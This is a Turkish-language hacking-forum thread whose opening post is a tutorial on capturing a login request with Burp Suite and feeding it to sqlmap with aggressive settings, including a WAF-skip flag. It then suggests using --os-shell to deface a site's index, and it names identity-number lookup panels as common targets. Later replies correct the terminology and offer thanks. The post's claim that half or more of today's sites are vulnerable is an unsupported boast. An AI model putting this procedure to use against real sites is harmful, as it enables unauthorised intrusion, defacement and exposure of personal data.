Burp Suite + Raw Request ile Login Bypass & SQL Injection (1 Viewer)

[RavenGod]

[TUTORIAL] Burp Suite ile Login Request Yakala & Raw’dan SQL Injection​

---

Burp Suite ile Request Yakalama​

1. Tarayıcını Burp Proxy’ye bağla (127.0.0.1:8080).
2. Hedef sitenin login sayfasına git.
3. Kullanıcı adı ve şifre alanına rastgele bir şey yaz (test:test).
4. Login’e tıkla, Burp’te interecept on olacak Proxy → HTTP history bölümüne bak.
5. Giriş isteğini bul → ctrl a ctrl c kopyala
   Kaydet: raw.txt

---

nano ile Düzenleme​

Terminalde:

nano raw.txt içine yapıştırın koodu sonra ctrl o enter ctrl x

sqlmap ile açık bul

sqlmap -r raw.txt nası kaydettiysenşiz dosyayı sqlmap -r raw.txt --random-agent --dbs --batch --level=5 --risk=3 --threads=10 --skip-waf
eğer db kullanıcısı yetkiliyse direkt --os-shell kullanıp shelli atıp basarsınız indexi bu açık günümüzdeki sitelerin 100de 50 60 ında var bazı sorgu panellerinin tc s*rgu kısımlarında hala var​

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[ExtacyGod]

login bypass olmuyor bu post sqli oluyor sadece loginde de değil sunucuya iletilen bütün isteklerde oluşabilir iletişim, arama, sepete ekle, giriş gibi çok yerde olabiliyor. eline sağlık iyi forumlar

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[RavenGod]

login bypass olmuyor bu post sqli oluyor sadece loginde de değil sunucuya iletilen bütün isteklerde oluşabilir iletişim, arama, sepete ekle, giriş gibi çok yerde olabiliyor. eline sağlık iyi forumlar

evet biraz eksik oldu aklıma gelmedi o an saolasın

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[L3genD]

güzel konu olmuş eline sağlık

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat